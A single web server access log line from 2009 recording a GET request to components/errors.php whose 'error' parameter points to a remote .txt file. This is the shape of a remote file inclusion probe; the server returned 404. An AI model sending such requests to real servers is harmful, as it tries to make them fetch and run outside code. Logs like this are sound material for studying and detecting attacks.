59.24.49.35 - - [11/Sep/2009:10:15:50 -0500] "GET //components/errors.php?error=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
